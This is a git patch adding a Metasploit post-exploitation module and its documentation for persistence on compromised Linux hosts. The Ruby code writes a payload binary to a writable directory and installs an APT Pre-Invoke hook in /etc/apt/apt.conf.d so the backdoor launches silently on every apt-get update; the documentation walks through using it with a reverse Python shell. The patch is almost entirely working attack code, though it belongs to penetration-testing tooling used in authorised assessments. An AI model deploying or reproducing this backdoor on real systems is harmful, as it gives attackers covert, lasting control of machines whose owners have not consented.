From 38bf99e729e3a09babf3d1779a787a2d40d8b71f Mon Sep 17 00:00:00 2001
From: Aaron Ringo <ringo.aaron@gmail.com>
Date: Sat, 30 Mar 2019 21:57:17 -0500
Subject: [PATCH] Re-add of module after jacking up rebase, with new
 arches,conditional logic, documentation

---
 .../local/apt_package_manager_persistence.md  | 36 +++++++
 .../local/apt_package_manager_persistence.rb  | 96 +++++++++++++++++++
 2 files changed, 132 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
 create mode 100644 modules/exploits/linux/local/apt_package_manager_persistence.rb

diff --git a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
new file mode 100644
index 0000000000..9e0480c85a
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
@@ -0,0 +1,36 @@
+## Apt package manager persistence
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. Module creates a pre-invoke hook
+for APT in apt.conf.d. The Hook name syntax is numeric followed by text.  
+
+### Testing
+
+1. Exploit a box that uses APT 
+2. `use linux/local/apt_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs apt-get update the payload will launch.  You must set handler accordingly.
+
+### Options
+
+**BACKDOOR_NAME**
+Name of backdoor executable
+ 
+**HOOKNAME**
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/ default is (05new-hook).
+Pre-invoke hooks name syntax is numeric followed by text. 
+  
+**SESSION**
+The session to run this module on.
+ 
+### Advanced Options
+
+**WritableDir**
+Writable directory for backdoor default is (/usr/local/bin/)       
+
+
+
diff --git a/modules/exploits/linux/local/apt_package_manager_persistence.rb b/modules/exploits/linux/local/apt_package_manager_persistence.rb
new file mode 100644
index 0000000000..3851604f5a
--- /dev/null
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'APT Package Manager Persistence',
+      'Description'    => %q{
+        This module will run a payload when the package manager is used. No
+        handler is ran automatically so you must configure an appropriate
+        exploit/multi/handler to connect. Module creates a pre-invoke hook
+        for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Aaron Ringo' ],
+      'Platform'       => [ 'linux','unix' ],
+      'Arch'           =>
+        [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
+      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
+        OptString.new('BACKDOOR_NAME', [ true, 'Name of binary to write', 'apthook' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ])
+      ])
+    end
+
+  def exploit
+
+    hook_path = "/etc/apt/apt.conf.d/"
+    unless writable? hook_path
+      fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
+    end
+    hook_path << datastore['HOOKNAME']
+
+    backdoor_path = datastore['WritableDir']
+    unless writable? backdoor_path
+      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
+    end
+    backdoor_path << datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+
+    print_status("Attempting to write hook:")
+    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} &\"};"
+    write_file(hook_path, hook_script)
+
+    unless exist? hook_path
+      fail_with Failure::Unknown, "Failed to write Hook"
+    end
+    print_status("Wrote #{hook_path}")
+
+    if payload.arch.first == 'cmd'
+      write_file(backdoor_path, payload.encoded)
+    else
+      write_file(backdoor_path, generate_payload_exe)
+    end
+
+    unless exist? backdoor_path
+      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
+    end
+    print_status("Backdoor uploaded #{backdoor_path}")
+    print_status("Backdoor will run on next Apt update")
+
+    # permissions chosen to reflect common perms in /usr/local/bin/
+    chmod(backdoor_path, 0755)
+
+  end
+end
+